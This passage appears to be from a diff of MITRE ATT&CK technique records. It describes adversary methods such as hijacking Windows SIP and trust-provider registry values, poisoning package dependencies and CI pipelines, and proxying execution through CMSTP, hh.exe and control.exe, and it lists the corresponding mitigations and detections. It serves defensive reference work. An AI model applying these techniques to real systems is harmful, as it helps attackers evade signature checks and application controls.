+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Christiaan Beek, @ChristiaanBeek"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.662000+00:00\", \"old_value\": \"2026-04-16 20:07:53.040000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0257: Detect Mark-of-the-Web (MOTW) Bypass via Container and Disk Image Files"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-05 19:34:04.910000+00:00",
+                    "modified": "2026-05-12 15:12:00.633000+00:00",
+                    "name": "SIP and Trust Provider Hijacking",
+                    "description": "Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)\n\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n\nSimilar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)\n\n* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID}</code> that point to the dynamic link library (DLL) providing a SIP\u2019s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file\u2019s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\n* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in <code>HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID}</code> that point to the DLL providing a SIP\u2019s CryptSIPDllVerifyIndirectData function, which validates a file\u2019s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\n* Modifying the <code>DLL</code> and <code>Function</code> Registry values in <code>HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust provider GUID}</code> that point to the DLL providing a trust provider\u2019s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP\u2019s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\n* **Note:** The above hijacks are also possible without modifying the Registry via [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking.\n\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1553/003",
+                            "external_id": "T1553.003"
+                        },
+                        {
+                            "source_name": "GitHub SIP POC Sept 2017",
+                            "description": "Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.",
+                            "url": "https://github.com/mattifestation/PoCSubjectInterfacePackage"
+                        },
+                        {
+                            "source_name": "SpectorOps Subverting Trust Sept 2017",
+                            "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.",
+                            "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf"
+                        },
+                        {
+                            "source_name": "Microsoft Catalog Files and Signatures April 2017",
+                            "description": "Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.",
+                            "url": "https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files"
+                        },
+                        {
+                            "source_name": "Microsoft Authenticode",
+                            "description": "Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.",
+                            "url": "https://msdn.microsoft.com/library/ms537359.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft WinVerifyTrust",
+                            "description": "Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.",
+                            "url": "https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx"
+                        },
+                        {
+                            "source_name": "EduardosBlog SIPs July 2008",
+                            "description": "Navarro, E. (2008, July 11). SIP\u2019s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.",
+                            "url": "https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Matt Graeber, @mattifestation, SpecterOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.633000+00:00\", \"old_value\": \"2026-04-16 20:07:53.087000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1024: Restrict Registry Permissions",
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0442: Detection Strategy for Subvert Trust Controls using SIP and Trust Provider Hijacking."
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-11 14:13:42.916000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Compromise Software Dependencies and Development Tools",
+                    "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications, such as pip and NPM packages, may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)(Citation: Bitdefender NPM Repositories Compromised 2021)(Citation: MANDVI Malicious npm and PyPI Packages Disguised) This may also include abandoned packages, which in some cases could be re-registered by threat actors after being removed by adversaries.(Citation: The Hacker News PyPi Revival Hijack 2024) Adversaries may also employ \"typosquatting\" or name-confusion by choosing names similar to existing popular libraries or packages in order to deceive a user.(Citation: Ahmed Backdoors in Python and NPM Packages)(Citation: Meyer PyPI Supply Chain Attack Uncovered)(Citation: Checkmarx-oss-seo)\n\nAdditionally, CI/CD pipeline components, such as GitHub Actions, may be targeted in order to gain access to the building, testing, and deployment cycles of an application.(Citation: Unit 42 Palo Alto GitHub Actions Supply Chain Attack 2025) By adding malicious code into a GitHub action, a threat actor may be able to collect runtime credentials (e.g., via [Proc Filesystem](https://attack.mitre.org/techniques/T1003/007)) or insert further malicious components into the build pipelines for a second-order supply chain compromise.(Citation: OWASP CICD-SEC-4) As GitHub Actions are often dependent on other GitHub Actions, threat actors may be able to infect a large number of repositories via the compromise of a single Action.(Citation: Palo Alto Networks GitHub Actions Worm 2023)\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "initial-access"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1195/001",
+                            "external_id": "T1195.001"
+                        },
+                        {
+                            "source_name": "Palo Alto Networks GitHub Actions Worm 2023",
+                            "description": "Asi Greenholts. (2023, September 14). The GitHub Actions Worm: Compromising GitHub Repositories Through the Actions Dependency Tree. Retrieved May 22, 2025.",
+                            "url": "https://www.paloaltonetworks.com/blog/cloud-security/github-actions-worm-dependencies/"
+                        },
+                        {
+                            "source_name": "Meyer PyPI Supply Chain Attack Uncovered",
+                            "description": "Darren Meyer. (2025, May 28). PyPI Supply Chain Attack Uncovered: Colorama and Colorizr Name Confusion. Retrieved September 24, 2025.",
+                            "url": "https://checkmarx.com/zero-post/python-pypi-supply-chain-attack-colorama/"
+                        },
+                        {
+                            "source_name": "Ahmed Backdoors in Python and NPM Packages",
+                            "description": "Deeba Ahmed. (2025, June 2). Backdoors in Python and NPM Packages Target Windows and Linux. Retrieved September 24, 2025.",
+                            "url": "https://hackread.com/backdoors-python-npm-packages-windows-linux/"
+                        },
+                        {
+                            "source_name": "MANDVI Malicious npm and PyPI Packages Disguised",
+                            "description": "MANDVI. (2025, April 22). Malicious npm and PyPI Packages Disguised as Dev Tools to Steal Credentials. Retrieved September 24, 2025.",
+                            "url": "https://cyberpress.org/malicious-npm-and-pypi-packages-disguised-as-dev-tools"
+                        },
+                        {
+                            "source_name": "Unit 42 Palo Alto GitHub Actions Supply Chain Attack 2025",
+                            "description": "Omer Gilm Aviad Hahami, Asi Greenholts, and Yaron Avital. (2025, March 20). GitHub Actions Supply Chain Attack: A Targeted Attack on Coinbase Expanded to the Widespread tj-actions/changed-files Incident: Threat Assessment . Retrieved May 22, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/github-actions-supply-chain-attack"
+                        },
+                        {
+                            "source_name": "OWASP CICD-SEC-4",
+                            "description": "OWASP. (n.d.). CICD-SEC-4: Poisoned Pipeline Execution (PPE). Retrieved May 22, 2025.",
+                            "url": "https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution"
+                        },
+                        {
+                            "source_name": "The Hacker News PyPi Revival Hijack 2024",
+                            "description": "Ravie Lakshmanan. (2024, September 4). Researchers Find Over 22,000 Removed PyPI Packages at Risk of Revival Hijack. Retrieved May 22, 2025.",
+                            "url": "https://thehackernews.com/2024/09/hackers-hijack-22000-removed-pypi.html"
+                        },
+                        {
+                            "source_name": "Bitdefender NPM Repositories Compromised 2021",
+                            "description": "Silviu Stahie. (2021, November 8). Popular NPM Repositories Compromised in Man-in-the-Middle Attack. Retrieved May 22, 2025.",
+                            "url": "https://www.bitdefender.com/en-gb/blog/hotforsecurity/popular-npm-repositories-compromised-in-man-in-the-middle-attack"
+                        },
+                        {
+                            "source_name": "Trendmicro NPM Compromise",
+                            "description": "Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019.",
+                            "url": "https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets"
+                        },
+                        {
+                            "source_name": "Checkmarx-oss-seo",
+                            "description": "Yehuda Gelb. (2024, April 10). New Technique to Trick Developers Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.",
+                            "url": "https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Enis Aksu",
+                        "Joe Gumke, U.S. Bank",
+                        "Liran Ravich, CardinalOps"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2025-10-24 17:48:27.436000+00:00\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1013: Application Developer Guidance",
+                            "M1016: Vulnerability Scanning",
+                            "M1033: Limit Software Installation",
+                            "M1051: Update Software"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0009: Supply-chain tamper in dependencies/dev-tools (manager\u2192write/install\u2192first-run\u2192egress)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.629000+00:00",
+                    "name": "System Binary Proxy Execution",
+                    "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.\n\nSimilarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218",
+                            "external_id": "T1218"
+                        },
+                        {
+                            "source_name": "GTFO split",
+                            "description": "GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.",
+                            "url": "https://gtfobins.github.io/gtfobins/split/"
+                        },
+                        {
+                            "source_name": "LOLBAS Project",
+                            "description": "Oddvar Moe et al. (2022, February).  Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.",
+                            "url": "https://github.com/LOLBAS-Project/LOLBAS#criteria"
+                        },
+                        {
+                            "source_name": "split man page",
+                            "description": "Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) \u2014 Linux manual page. Retrieved March 25, 2022.",
+                            "url": "https://man7.org/linux/man-pages/man1/split.1.html"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Hans Christoffer Gaardl\u00f8s",
+                        "Nishan Maharjan, @loki248",
+                        "Praetorian",
+                        "Wes Hurd"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "4.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.629000+00:00\", \"old_value\": \"2026-04-15 22:37:10.607000+00:00\"}}}",
+                    "previous_version": "4.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1026: Privileged Account Management",
+                            "M1037: Filter Network Traffic",
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1050: Exploit Protection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0081: Detection of Proxy Execution via Trusted Signed Binaries Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-23 18:27:30.656000+00:00",
+                    "modified": "2026-05-12 15:12:00.631000+00:00",
+                    "name": "CMSTP",
+                    "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / \u201dSquiblydoo\u201d, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/003",
+                            "external_id": "T1218.003"
+                        },
+                        {
+                            "source_name": "Twitter CMSTP Usage Jan 2018",
+                            "description": "Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved September 12, 2024.",
+                            "url": "https://x.com/ItsReallyNick/status/958789644165894146"
+                        },
+                        {
+                            "source_name": "Microsoft Connection Manager Oct 2009",
+                            "description": "Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.",
+                            "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)"
+                        },
+                        {
+                            "source_name": "MSitPros CMSTP Aug 2017",
+                            "description": "Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018.",
+                            "url": "https://msitpros.com/?p=3960"
+                        },
+                        {
+                            "source_name": "GitHub Ultimate AppLocker Bypass List",
+                            "description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.",
+                            "url": "https://github.com/api0cradle/UltimateAppLockerByPassList"
+                        },
+                        {
+                            "source_name": "Endurant CMSTP July 2018",
+                            "description": "Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20190316220149/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/"
+                        },
+                        {
+                            "source_name": "Twitter CMSTP Jan 2018",
+                            "description": "Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved September 12, 2024.",
+                            "url": "https://x.com/NickTyrer/status/958450014111633408"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Nik Seetharaman, Palantir",
+                        "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.631000+00:00\", \"old_value\": \"2026-04-15 22:37:18.154000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0328: Detection of Malicious Profile Installation via CMSTP.exe"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-23 18:53:54.377000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Compiled HTML File",
+                    "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1218/001",
+                            "external_id": "T1218.001"
+                        },
+                        {
+                            "source_name": "Microsoft CVE-2017-8625 Aug 2017",
+                            "description": "Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.",
+                            "url": "https://web.archive.org/web/20250419140549/https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2017-8625"
+                        },
+                        {
+                            "source_name": "Microsoft HTML Help May 2018",
+                            "description": "Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.",
+                            "url": "https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk"
+                        },
+                        {
+                            "source_name": "Microsoft HTML Help Executable Program",
+                            "description": "Microsoft. (n.d.). About the HTML Help Executable Program. Retrieved October 3, 2018.",
+                            "url": "https://msdn.microsoft.com/windows/desktop/ms524405"
+                        },
+                        {
+                            "source_name": "Microsoft HTML Help ActiveX",
+                            "description": "Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.",
+                            "url": "https://msdn.microsoft.com/windows/desktop/ms644670"
+                        },
+                        {
+                            "source_name": "MsitPros CHM Aug 2017",
+                            "description": "Moe, O. (2017, August 13). Bypassing Device guard UMCI using CHM \u2013 CVE-2017-8625. Retrieved October 3, 2018.",
+                            "url": "https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2026-04-15 22:37:42.151000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0342: Detection of Suspicious Compiled HTML File Execution via hh.exe"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-23 19:59:52.630000+00:00",
+                    "modified": "2026-05-12 15:12:00.632000+00:00",
+                    "name": "Control Panel",
+                    "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a <code>CPlApplet</code> function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to <code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls</code>. Even when these registered DLLs do not comply with the CPL file specification and do not export <code>CPlApplet</code> functions, they are loaded and executed through its <code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting <code>CPlApplet</code> are not directly executable.(Citation: ESET InvisiMole June 2020)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
